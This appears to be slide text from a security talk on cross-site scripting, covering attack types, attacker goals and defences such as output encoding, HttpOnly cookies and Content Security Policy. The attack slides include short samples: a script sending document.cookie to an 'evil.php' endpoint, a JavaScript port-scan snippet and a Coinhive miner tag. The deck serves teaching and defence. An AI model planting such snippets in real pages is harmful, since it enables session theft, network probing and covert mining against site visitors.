3. Cross-Site Scripting (XSS)
Malicious scripts are injected into otherwise benign and trusted web sites
Web application uses input within the output it generates without validating or
encoding it
Bypass the same-origin policy
~20 years old
OWASP TOP 10 – 2017: A7
3
5. XSS mechanics
There are three types of XSS attack:
Stored (AKA Persistent)
Reflected (AKA Non-Persistent)
DOM Based (AKA Client Side XSS)
5
6. Stored XSS
User input is stored on the target server.
A victim retrieves the stored data from the web application without that data being made safe to
render in the browser.
6
7. Reflected XSS
7
The data is not stored permanently on the server.
User input is immediately returned by a Web application in response.
8. DOM Based XSS
8
The attack payload is executed as a result of modifying the DOM (Document Object Model) in the
victim’s browser.
The page itself (the HTTP response) does not change.
Example: <script> document.write("<b>Current URL</b> : " + document.location.href); </script>
11. Samy worm
The fastest-spreading computer virus of all time
11
12. XSS – what can attackers do?
Session hijacking
Phishing
Defacements
Installation of Trojan horses
Browser exploits
Port scanning
DDoS attacks
Crypto miner$
12
13. Session hijacking
Cookie based authentication
13
<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>
14. Phishing
This technique is by far the most successful on the Internet today.
Most methods use a link that leads to a spoofed website:
Misspelled URLs
Subdomains:
http://www.yourbank.malicious.com
Covert redirect:
http://www.yourbank.example.com/?redirect=http://www.malicious.com
14
15. Phishing with XSS
Why are XSS Phishing attacks particularly problematic?
They direct the user to sign in at the service's own web page, where everything from the Web
address to the SSL certificate is valid.
15
17. Port scanning
Probe a server or host for open ports
Often used by attackers to identify network services running on a host and exploit vulnerabilities
Did you know that you can perform a port scan via JavaScript?
17
18. Port scanning via XSS
The victim's workstation is used as a stepping stone to attack other systems.
An XSS flaw can lead to a full network compromise.
18
window.onerror = handleError;
var newScript = document.createElement('script');
newScript.src = 'http://' + host + ':' + port;
function handleError(message, url, line)
{
if(message.match(/Script error|Error loading script/))
{
// Open!
}
}
19. Persistent XSS Enables Large-Scale DDoS Attack
Sohu.com - 27th most visited website in
the world
Attack: 20 million GET requests originating
from 22,000 browsers
Sophisticated code that keeps track of the
attack for billing purposes
19
20. XSS crypto miners
Any site with stored XSS is exposed to JavaScript crypto mining malware (like Monero ).
“An XSS exploit in our KaTeX parser was used to embed
a JavaScript crypto miner in clients via an exploitative message.”
100% CPU?
Coinhive:
Cryptocurrency mining service
Identified by multiple security firms as the top malicious threat to Web users
Keeps 30% of whatever amount of Monero is mined using its code, whether or not a Web site has given consent to
run it.
20
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
22. Input validation
Trust no one - all input must be validated:
On server side!
Client side validation should be used as a second line of defense.
Validate pattern (e.g. credit card number), characters and length.
Strategy:
1. Whitelisting: [A-Za-z0-9]*
2. Greylisting: .*[<>].*
3. Blacklisting: <script>alert(1)</script>
Input validation is not the primary safeguards against Cross-Site Scripting.
22
25. Output encoding
Convert untrusted input into a safe form
Display data without executing as code in the browser
Needs to occur within a specific context:
HTML
JavaScript
URL
CSS
In addition to input validation
25
26. Output encoding – HTML context
HTML encoding:
When you want to put untrusted data directly into the HTML body
HTML attribute encoding:
This should not be used for complex attributes like href, src, style, or any of the event handlers like onmouseover.
26
27. Output encoding – JavaScript context
JavaScript encoding:
For dynamically generated JavaScript code
It is extremely easy to switch into an execution context => use with caution!
Some JS functions can never safely use untrusted data as input - EVEN IF JAVASCRIPT ESCAPED!
Can we use to escape special characters?
Escape the escape: “ => ”
Escape all non-alphanumeric characters with xHH: “ => x22
27
28. Log everything!
28
2018-03-19 15:10:26,697 - login - INFO – User John logged out.
2018-03-19 15:10:26,697 - login - ERROR – User <script>alert(‘xss’);</script> entered incorrect password.
29. HTTPOnly cookie flag
Preventing all XSS flaws in an application is hard => protect cookies from XSS attacks!
HttpOnly cookies are inaccessible to JavaScript's Document.cookie API.
An additional flag included in a Set-Cookie HTTP response header:
29
Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly
30. Content Security Policy (CSP)
“Defense in depth" technique against content injection attacks
A declarative policy that controls resources the browser is allowed to load
Requires browser support (supported by most)
Content-Security-Policy HTTP header:
30
Content-Security-Policy: default-src 'none'; script-src 'self'; img-src 'self'; style-src 'self';
Allows images, scripts, and CSS from the same originNo other resources can load
32. X-XSS-Protection
The browser detects reflected cross-site scripting attacks
Provides protections for older web browsers that don't support CSP
Syntax:
32
X-XSS-Protection: 0
X-XSS-Protection: 1
X-XSS-Protection: 1; mode=block
X-XSS-Protection: 1; report=<reporting-uri>
33. Framework security
Address security while choosing a new technology/framework.
Angular:
All values are treated as untrusted by default.
Interpolated content is always escaped:
HTML properties - unsafe values are recognized and sanitized automatically:
33
34. Dynamic analysis
Hack yourself!
Works the best combined with some manual testing.
Open source tools:
OWASP ZAP
Burp free
Grabber
34
36. Static analysis
Examine the code without executing the program.
Reveal hidden vulnerabilities that dynamic or manual testing/code review do not detect.
High number of False Positives: for some tools, up to 85%!
Do not try to reproduce every reported vulnerability!
36
37. Web Application Firewall (WAF)
A reverse proxy that filters, monitors, and blocks HTTP traffic:
Appliance
Server plugin
Cloud
False Positives and False Negatives
Customization and maintenance
Great for zero-day attacks
An additional security layer
37